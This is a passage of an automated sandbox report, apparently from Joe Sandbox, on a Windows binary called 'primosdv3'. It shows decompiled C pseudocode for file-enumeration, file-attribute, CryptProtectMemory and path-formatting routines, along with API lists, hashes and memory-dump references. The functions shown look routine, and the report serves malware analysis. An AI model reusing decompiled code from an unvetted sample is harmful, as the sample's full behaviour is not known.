													_v116 = _t111 ^ _t220;
													_t169 = _v100;
													_push(_t153);
													_t154 = _v104;
													_push(_t211);
													_t212 = _v96;
													_push(_t200);
													_v440 = _t212;
													while(1) {
														__eflags = _t169 - _t154;
														if(_t169 == _t154) {
															break;
														}
														_t113 =  *_t169;
														__eflags = _t113 - 0x2f;
														if(_t113 != 0x2f) {
															__eflags = _t113 - 0x5c;
															if(_t113 != 0x5c) {
																__eflags = _t113 - 0x3a;
																if(_t113 != 0x3a) {
																	_t169 = E00C8F150(_t154, _t169);
																	continue;
																}
															}
														}
														break;
													}
													_t193 =  *_t169;
													__eflags = _t193 - 0x3a;
													if(_t193 != 0x3a) {
														L47:
														_t201 = 0;
														__eflags = _t193 - 0x2f;
														if(_t193 == 0x2f) {
															L51:
															_t115 = 1;
															__eflags = 1;
														} else {
															__eflags = _t193 - 0x5c;
															if(_t193 == 0x5c) {
																goto L51;
															} else {
																__eflags = _t193 - 0x3a;
																if(_t193 == 0x3a) {
																	goto L51;
																} else {
																	_t115 = 0;
																}
															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
														E00C7FFF0(_t201,  &_v336, _t201, 0x140);
														_t226 = _t225 + 0xc;
														_t213 = FindFirstFileExA(_t154, _t201,  &_v336, _t201, _t201, _t201);
														_t123 = _v340;
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t173;
															_v348 = _t173 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t154);
																	_push(_t123);
																	L28();
																	_t226 = _t226 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t177 = _v291;
																	__eflags = _t177;
																	if(_t177 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t177 - 0x2e;
																		if(_t177 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t213,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t193 =  *_t123;
															_t178 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t178 - _t131;
															if(_t178 != _t131) {
																E00C86310(_t154, _t193 + _t178 * 4, _t131 - _t178, 4, E00C8B1A0);
															}
														} else {
															_push(_t123);
															_push(_t201);
															_push(_t201);
															_push(_t154);
															L28();
															L54:
															_t201 = _t123;
														}
														__eflags = _t213 - 0xffffffff;
														if(_t213 != 0xffffffff) {
															FindClose(_t213);
														}
														_t124 = _t201;
													} else {
														_t124 =  &(_t154[1]);
														__eflags = _t169 -  &(_t154[1]);
														if(_t169 ==  &(_t154[1])) {
															goto L47;
														} else {
															_push(_t212);
															_push(0);
															_push(0);
															_push(_t154);
															L28();
														}
													}
													L58:
													_pop(_t202);
													_pop(_t214);
													__eflags = _v16 ^ _t220;
													_pop(_t155);
													return E00C7FBBC(_t124, _t155, _v16 ^ _t220, _t193, _t202, _t214);
												} else {
													goto L34;
												}
											}
										} else {
											_t138 = 0xc;
											L36:
											return _t138;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t194 = _v16;
									 *((intOrPtr*)(_v24 + _t197)) = _t194;
									_t197 = _t197 + 4;
									_t191 = _t194 + _v12;
									_v16 = _t194 + _v12;
									__eflags = _t197 - _t150;
								} while (_t197 != _t150);
								goto L23;
							}
						} else {
							_t198 = _t197 | 0xffffffff;
							L24:
							E00C88DCC(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t159;
							_t146 = E00C8F110( *_t206,  &_v8);
							__eflags = _t146;
							if(_t146 != 0) {
								_push( &_v36);
								_push(_t146);
								_push( *_t206);
								L38();
								_t222 = _t222 + 0xc;
							} else {
								_t146 =  &_v36;
								_push(_t146);
								_push(0);
								_push(0);
								_push( *_t206);
								L28();
								_t222 = _t222 + 0x10;
							}
							_t198 = _t146;
							__eflags = _t198;
							if(_t198 != 0) {
								break;
							}
							_t206 = _t206 + 4;
							_t159 = 0;
							__eflags =  *_t206;
							if( *_t206 != 0) {
								continue;
							} else {
								_t150 = _v336.cAlternateFileName;
								_t197 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00C8B562( &_v36);
						_t91 = _t198;
						goto L26;
					}
				} else {
					_t147 = E00C891A8();
					_t217 = 0x16;
					 *_t147 = _t217;
					E00C89087();
					_t91 = _t217;
					L26:
					return _t91;
				}
				L68:
			}

0x00c8b1bd
0x00c8b1c0
0x00c8b1c6
0x00c8b1de
0x00c8b1e1
0x00c8b1e5
0x00c8b1e7
0x00c8b1e9
0x00c8b1eb
0x00c8b1ee
0x00c8b1f1
0x00c8b1f4
0x00c8b1f6
0x00c8b24e
0x00c8b24e
0x00c8b254
0x00c8b256
0x00c8b261
0x00c8b265
0x00c8b267
0x00c8b26a
0x00c8b26e
0x00c8b26e
0x00c8b270
0x00c8b272
0x00c8b274
0x00c8b276
0x00c8b276
0x00c8b278
0x00c8b27b
0x00c8b27e
0x00c8b27e
0x00c8b280
0x00c8b281
0x00c8b281
0x00c8b28c
0x00c8b28e
0x00c8b291
0x00c8b292
0x00c8b295
0x00c8b295
0x00c8b299
0x00c8b29c
0x00c8b29f
0x00c8b29f
0x00c8b2ad
0x00c8b2af
0x00c8b2b2
0x00c8b2b4
0x00c8b2be
0x00c8b2c1
0x00c8b2c4
0x00c8b2c6
0x00c8b2c9
0x00c8b2cb
0x00c8b31b
0x00c8b31e
0x00c8b31e
0x00c8b320
0x00000000
0x00c8b2cd
0x00c8b2cf
0x00c8b2cf
0x00c8b2d1
0x00c8b2d4
0x00c8b2d4
0x00c8b2d9
0x00c8b2dc
0x00c8b2dc
0x00c8b2de
0x00c8b2df
0x00c8b2df
0x00c8b2e3
0x00c8b2e6
0x00c8b2e6
0x00c8b2e9
0x00c8b2ec
0x00c8b2f9
0x00c8b2fe
0x00c8b301
0x00c8b303
0x00c8b33d
0x00c8b33e
0x00c8b33f
0x00c8b340
0x00c8b341
0x00c8b342
0x00c8b347
0x00c8b34b
0x00c8b34d
0x00c8b34e
0x00c8b351
0x00c8b351
0x00c8b354
0x00c8b354
0x00c8b356
0x00c8b357
0x00c8b357
0x00c8b360
0x00c8b361
0x00c8b364
0x00c8b367
0x00c8b36a
0x00c8b36c
0x00c8b373
0x00c8b375
0x00c8b378
0x00c8b382
0x00c8b385
0x00c8b386
0x00c8b388
0x00c8b39c
0x00c8b39c
0x00c8b39f
0x00c8b3a9
0x00c8b3ae
0x00c8b3b1
0x00c8b3b3
0x00000000
0x00c8b3b5
0x00c8b3b9
0x00c8b3c2
0x00c8b3c8
0x00000000
0x00c8b3cb
0x00c8b38a
0x00c8b38a
0x00c8b390
0x00c8b395
0x00c8b398
0x00c8b39a
0x00c8b3d1
0x00c8b3d3
0x00c8b3d4
0x00c8b3d5
0x00c8b3d6
0x00c8b3d7
0x00c8b3d8
0x00c8b3dd
0x00c8b3e0
0x00c8b3e1
0x00c8b3e3
0x00c8b3e9
0x00c8b3f0
0x00c8b3f3
0x00c8b3f6
0x00c8b3f7
0x00c8b3fa
0x00c8b3fb
0x00c8b3fe
0x00c8b3ff
0x00c8b420
0x00c8b420
0x00c8b422
0x00000000
0x00000000
0x00c8b407
0x00c8b409
0x00c8b40b
0x00c8b40d
0x00c8b40f
0x00c8b411
0x00c8b413
0x00c8b41e
0x00000000
0x00c8b41e
0x00c8b413
0x00c8b40f
0x00000000
0x00c8b40b
0x00c8b424
0x00c8b426
0x00c8b429
0x00c8b442
0x00c8b442
0x00c8b444
0x00c8b447
0x00c8b457
0x00c8b459
0x00c8b459
0x00c8b449
0x00c8b449
0x00c8b44c
0x00000000
0x00c8b44e
0x00c8b44e
0x00c8b451
0x00000000
0x00c8b453
0x00c8b453
0x00c8b453
0x00c8b451
0x00c8b44c
0x00c8b467
0x00c8b46b
0x00c8b479
0x00c8b47e
0x00c8b493
0x00c8b495
0x00c8b49b
0x00c8b49e
0x00c8b4d0
0x00c8b4d0
0x00c8b4d5
0x00c8b4db
0x00c8b4db
0x00c8b4e2
0x00c8b4fc
0x00c8b4fc
0x00c8b4fd
0x00c8b503
0x00c8b509
0x00c8b50a
0x00c8b50b
0x00c8b510
0x00c8b513
0x00c8b515
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8b4e4
0x00c8b4e4
0x00c8b4ea
0x00c8b4ec
0x00000000
0x00c8b4ee
0x00c8b4ee
0x00c8b4f1
0x00000000
0x00c8b4f3
0x00c8b4f3
0x00c8b4fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8b4fa
0x00c8b4f1
0x00c8b4ec
0x00000000
0x00c8b517
0x00c8b51f
0x00c8b525
0x00c8b527
0x00c8b527
0x00c8b52f
0x00c8b534
0x00c8b53c
0x00c8b53f
0x00c8b541
0x00c8b555
0x00c8b55a
0x00c8b4a0
0x00c8b4a0
0x00c8b4a1
0x00c8b4a2
0x00c8b4a3
0x00c8b4a4
0x00c8b4ac
0x00c8b4ac
0x00c8b4ac
0x00c8b4ae
0x00c8b4b1
0x00c8b4b4
0x00c8b4b4
0x00c8b4ba
0x00c8b42b
0x00c8b42b
0x00c8b42e
0x00c8b430
0x00000000
0x00c8b432
0x00c8b432
0x00c8b435
0x00c8b436
0x00c8b437
0x00c8b438
0x00c8b43d
0x00c8b430
0x00c8b4bc
0x00c8b4bf
0x00c8b4c0
0x00c8b4c1
0x00c8b4c3
0x00c8b4cc
0x00000000
0x00000000
0x00000000
0x00c8b39a
0x00c8b36e
0x00c8b370
0x00c8b3cc
0x00c8b3d0
0x00c8b3d0
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8b305
0x00c8b308
0x00c8b30b
0x00c8b30e
0x00c8b311
0x00c8b314
0x00c8b317
0x00c8b317
0x00000000
0x00c8b2d4
0x00c8b2b6
0x00c8b2b6
0x00c8b322
0x00c8b324
0x00000000
0x00c8b329
0x00c8b1f8
0x00c8b1f8
0x00c8b1fb
0x00c8b204
0x00c8b207
0x00c8b20e
0x00c8b210
0x00c8b229
0x00c8b22a
0x00c8b22b
0x00c8b22d
0x00c8b232
0x00c8b212
0x00c8b212
0x00c8b215
0x00c8b216
0x00c8b218
0x00c8b21a
0x00c8b21c
0x00c8b221
0x00c8b221
0x00c8b235
0x00c8b237
0x00c8b239
0x00000000
0x00000000
0x00c8b23f
0x00c8b242
0x00c8b244
0x00c8b246
0x00000000
0x00c8b248
0x00c8b248
0x00c8b24b
0x00000000
0x00c8b24b
0x00000000
0x00c8b246
0x00c8b32a
0x00c8b32d
0x00c8b332
0x00000000
0x00c8b335
0x00c8b1c8
0x00c8b1c8
0x00c8b1cf
0x00c8b1d0
0x00c8b1d2
0x00c8b1d7
0x00c8b336
0x00c8b33a
0x00c8b33a
0x00000000

APIs

_free.LIBCMT ref: 00C8B324

Part of subcall function 00C89097: IsProcessorFeaturePresent.KERNEL32(00000017,00C89086,00000000,00C88D94,00000000,00000000,00000000,00000016,?,?,00C89093,00000000,00000000,00000000,00000000,00000000), ref: 00C89099
Part of subcall function 00C89097: GetCurrentProcess.KERNEL32(C0000417,00C88D94,00000000,?,00000003,00C89868), ref: 00C890BB
Part of subcall function 00C89097: TerminateProcess.KERNEL32(00000000,?,00000003,00C89868), ref: 00C890C2

Strings

*?, xrefs: 00C8B1FB
., xrefs: 00C8B4DB

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction ID: d041ce0a7fea69b87bf64adbd3d05f7f75d071e39436b5d018c6b4dce1e2d440
Opcode Fuzzy Hash: 871087a43f0bd1cbd1098384f5f5eb82fa4a5fd881eee7424b44ab4bf77dde44
Instruction Fuzzy Hash: 3F518271E0020AEFDF14EFA8C881AADF7B5EF58318F244169E854E7351EB359E019B54

Uniqueness

Uniqueness Score: -1.00%

Function 00C675DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137
timeCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00C675DE(void* __ecx) {
				void* __esi;
				char _t55;
				signed int _t58;
				void* _t62;
				signed int _t63;
				signed int _t69;
				signed int _t86;
				void* _t91;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				E00C7EB78(0xc927e9, _t108);
				E00C7EC50(0x60f8);
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00C70602(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t82 =  *((intOrPtr*)(_t108 + 8));
					E00C677DF(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4094, 0x800);
					_t113 =  *((short*)(_t108 - 0x4094)) - 0x3a;
					if( *((short*)(_t108 - 0x4094)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00C705DA(__eflags, _t108 - 0x1014, _t108 - 0x4094, _t101);
							E00C66EDB(_t108 - 0x3094);
							_push(0);
							_t55 = E00C6A56D(_t108 - 0x3094, __eflags, _t106, _t108 - 0x3094);
							_t86 =  *(_t108 - 0x208c);
							 *((char*)(_t108 - 0xd)) = _t55;
							__eflags = _t86 & 0x00000001;
							if((_t86 & 0x00000001) != 0) {
								__eflags = _t86 & 0xfffffffe;
								E00C6A4ED(_t106, _t86 & 0xfffffffe);
							}
							E00C69556(_t108 - 0x204c);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t58 = E00C69F1A(_t108 - 0x204c, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t58;
							if(_t58 != 0) {
								_push(0);
								_push(_t108 - 0x204c);
								_push(0);
								_t69 = E00C63BBA(_t82);
								__eflags = _t69;
								if(_t69 != 0) {
									E00C69620(_t108 - 0x204c);
								}
							}
							E00C69556(_t108 - 0x50cc);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t63 = E00C698E0(_t108 - 0x50cc, _t106, _t106, 5);
								__eflags = _t63;
								if(_t63 != 0) {
									SetFileTime( *(_t108 - 0x50c4), _t108 - 0x206c, _t108 - 0x2064, _t108 - 0x205c);
								}
							}
							E00C6A4ED(_t106,  *(_t108 - 0x208c));
							E00C6959A(_t108 - 0x50cc);
							_t91 = _t108 - 0x204c;
						} else {
							E00C69556(_t108 - 0x6104);
							_push(1);
							_push(_t108 - 0x6104);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00C63BBA(_t82);
							_t91 = _t108 - 0x6104;
						}
						_t62 = E00C6959A(_t91);
					} else {
						E00C62021(_t113, 0x53, _t82 + 0x32, _t106);
						_t62 = E00C66D83(0xca1098, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t62;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00C70602(_t108 - 0x1014, 0xc937a0, 0x802);
					E00C705DA(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x00c675e3
0x00c675ed
0x00c675f4
0x00c675fd
0x00c6762c
0x00c6762c
0x00c6763a
0x00c6763f
0x00c6763f
0x00c6764f
0x00c67654
0x00c6765c
0x00c6767b
0x00c6767f
0x00c676bc
0x00c676c7
0x00c676d4
0x00c676d7
0x00c676dc
0x00c676e2
0x00c676e5
0x00c676e8
0x00c676ea
0x00c676ef
0x00c676ef
0x00c676fa
0x00c67707
0x00c67715
0x00c6771a
0x00c6771c
0x00c6771e
0x00c67727
0x00c67728
0x00c67729
0x00c6772e
0x00c67730
0x00c67738
0x00c67738
0x00c67730
0x00c67743
0x00c67748
0x00c6774c
0x00c67750
0x00c6775b
0x00c67760
0x00c67762
0x00c6777f
0x00c6777f
0x00c67762
0x00c6778c
0x00c67797
0x00c6779c
0x00c67681
0x00c67687
0x00c6768c
0x00c67696
0x00c67697
0x00c6769a
0x00c6769d
0x00c676a2
0x00c676a2
0x00c677a2
0x00c6765e
0x00c67665
0x00c67671
0x00c67671
0x00c677ad
0x00c677b5
0x00c677b5
0x00c675ff
0x00c67603
0x00000000
0x00c67605
0x00c67605
0x00c67617
0x00c67625
0x00000000
0x00c67625

APIs

__EH_prolog.LIBCMT ref: 00C675E3

Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0

Part of subcall function 00C6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00C6777F

Part of subcall function 00C6A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
Part of subcall function 00C6A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532

Strings

:, xrefs: 00C67654

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 7409faa0117bf6310a01d87917841323d17715f08ba6a2c63070d8b3d71637ec
Instruction ID: a59f58f4e68a3d8a1b580759f1993fb0b3c6fb315c30fe23e1f0050888e83170
Opcode Fuzzy Hash: 7409faa0117bf6310a01d87917841323d17715f08ba6a2c63070d8b3d71637ec
Instruction Fuzzy Hash: E8417171804158AAEB35EB64CCD9EEEB37CEF45304F008596B60AA2092DB749F85DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00C7B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00C7B48E(void* __ecx, void* __edx, void* __eflags, char _a3, char _a4, char _a7, char _a8, intOrPtr* _a8200) {
				void* __edi;
				void* __ebp;
				intOrPtr _t20;
				short* _t31;
				intOrPtr* _t33;
				signed int _t41;
				intOrPtr* _t42;
				void* _t44;

				E00C7EC50(0x2004);
				_push(0x80000);
				_t42 = E00C83E33(__ecx);
				if(_t42 == 0) {
					E00C66CA7(0xca1098);
				}
				_t33 = _a8200;
				 *_t42 = 0;
				_t41 = 0;
				while(1) {
					_push(0x1000);
					_push( &_a3);
					_push(0);
					_push(0);
					_push( &_a4);
					_push( *_t33);
					_t20 = E00C7B314(_t41, 0);
					 *_t33 = _t20;
					if(_t20 == 0) {
						break;
					}
					if( *_t42 != 0 || _a8 != 0x7b) {
						if(_a8 == 0x7d || E00C83E13( &_a8) + _t41 > 0x3fffb) {
							break;
						} else {
							E00C87686(_t42,  &_a8);
							_t41 = E00C83E13(_t42);
							_t44 = _t44 + 0xc;
							if(_t41 == 0) {
								L11:
								if(_a7 == 0) {
									E00C86066(_t42 + _t41 * 2, L"\r\n");
								}
								continue;
							}
							_t6 = _t41 - 1; // -1
							_t31 = _t42 + _t6 * 2;
							while( *_t31 == 0x20) {
								_t31 = _t31 - 2;
								_t41 = _t41 - 1;
								if(_t41 != 0) {
									continue;
								}
								goto L11;
							}
							goto L11;
						}
					} else {
						continue;
					}
				}
				return _t42;
			}

0x00c7b493
0x00c7b49c
0x00c7b4a6
0x00c7b4ab
0x00c7b4b2
0x00c7b4b2
0x00c7b4b7
0x00c7b4c2
0x00c7b4c5
0x00c7b537
0x00c7b537
0x00c7b540
0x00c7b541
0x00c7b542
0x00c7b547
0x00c7b548
0x00c7b54a
0x00c7b54f
0x00c7b553
0x00000000
0x00000000
0x00c7b4cc
0x00c7b4dc
0x00000000
0x00c7b4f2
0x00c7b4f8
0x00c7b503
0x00c7b505
0x00c7b50a
0x00c7b520
0x00c7b525
0x00c7b530
0x00c7b536
0x00000000
0x00c7b525
0x00c7b50c
0x00c7b50f
0x00c7b512
0x00c7b518
0x00c7b51b
0x00c7b51e
0x00000000
0x00000000
0x00000000
0x00c7b51e
0x00000000
0x00c7b512
0x00000000
0x00000000
0x00000000
0x00c7b4cc
0x00c7b565

APIs

_wcslen.LIBCMT ref: 00C7B4E3
_wcslen.LIBCMT ref: 00C7B4FE

Strings

}, xrefs: 00C7B4D6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 5da503a9931ca0cad9bf816e5da28bc34af1c2ed4ec346ce3ef21f902df1a8ba
Instruction ID: b181bab1c53fbf5b9232bd27f58527e0a1d985becea8d4f7cd4e9a9e96add1a2
Opcode Fuzzy Hash: 5da503a9931ca0cad9bf816e5da28bc34af1c2ed4ec346ce3ef21f902df1a8ba
Instruction Fuzzy Hash: 4E21F07290431A5ADB31EA64D845F6BB3ECDF81758F14842AF648C3141FB74EE4893A6

Uniqueness

Uniqueness Score: -1.00%

Function 00C6F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00C6F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C6F2E4
Part of subcall function 00C6F2C5: GetProcAddress.KERNEL32(00CA81C8,CryptUnprotectMemory), ref: 00C6F2F4

GetCurrentProcessId.KERNEL32(?,?,?,00C6F33E), ref: 00C6F3D2

Strings

CryptUnprotectMemory failed, xrefs: 00C6F3CA
CryptProtectMemory failed, xrefs: 00C6F389

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 7b457ff683faa6e91e2d0f120e295df844b0ed7f227b867cc898650cba161f88
Instruction ID: 548afac30086b03eb6652738e226390388690b5f3230b1f725f5bdd0c697165c
Opcode Fuzzy Hash: 7b457ff683faa6e91e2d0f120e295df844b0ed7f227b867cc898650cba161f88
Instruction Fuzzy Hash: A7110331A01669ABEF319B25EC89B6E3754FF01B24B04813AFC116B361DB349E038790

Uniqueness

Uniqueness Score: -1.00%

Function 00C6B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00C6B991(void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				short _t13;
				signed int _t14;
				short* _t19;
				signed int _t20;
				void* _t22;
				signed short* _t26;
				signed int _t28;
				signed int _t30;

				_t19 = _a8;
				_t26 = _a4;
				 *_t19 = 0;
				_t10 = E00C6BC98(__eflags, _t26);
				_t20 =  *_t26 & 0x0000ffff;
				if(_t10 != 0) {
					return E00C64092(_t19, _a12, L"%c:\\", _t20);
				}
				_t28 = 0x5c;
				__eflags = _t20 - _t28;
				if(_t20 == _t28) {
					__eflags = _t26[1] - _t28;
					if(_t26[1] == _t28) {
						_push(_t28);
						_push( &(_t26[2]));
						_t10 = E00C822C6(_t20);
						_pop(_t22);
						__eflags = _t10;
						if(_t10 != 0) {
							_push(_t28);
							_push(_t10 + 2);
							_t13 = E00C822C6(_t22);
							__eflags = _t13;
							if(_t13 == 0) {
								_t14 = E00C83E13(_t26);
							} else {
								_t14 = (_t13 - _t26 >> 1) + 1;
							}
							__eflags = _t14 - _a12;
							asm("sbb esi, esi");
							_t30 = _t28 & _t14;
							E00C860C2(_t19, _t26, _t30);
							_t10 = 0;
							__eflags = 0;
							 *((short*)(_t19 + _t30 * 2)) = 0;
						}
					}
				}
				return _t10;
			}

0x00c6b992
0x00c6b999
0x00c6b99e
0x00c6b9a1
0x00c6b9a6
0x00c6b9ab
0x00000000
0x00c6b9bd
0x00c6b9c5
0x00c6b9c6
0x00c6b9c9
0x00c6b9cb
0x00c6b9cf
0x00c6b9d4
0x00c6b9d5
0x00c6b9d6
0x00c6b9dc
0x00c6b9dd
0x00c6b9df
0x00c6b9e4
0x00c6b9e5
0x00c6b9e6
0x00c6b9ed
0x00c6b9ef
0x00c6b9f9
0x00c6b9f1
0x00c6b9f5
0x00c6b9f5
0x00c6b9ff
0x00c6ba03
0x00c6ba05
0x00c6ba0a
0x00c6ba12
0x00c6ba12
0x00c6ba14
0x00c6ba14
0x00c6b9df
0x00c6b9cf
0x00000000

APIs

_swprintf.LIBCMT ref: 00C6B9B8

Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5

Strings

%c:\, xrefs: 00C6B9AE

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 20944edbe86703f9d2c7c8edc5db9af38acbac081ac9a8507c4204983803540e
Instruction ID: acd7e15c3dfe86e739574cee09ab1853780c32d262cbb15f233bac988fe17aaf
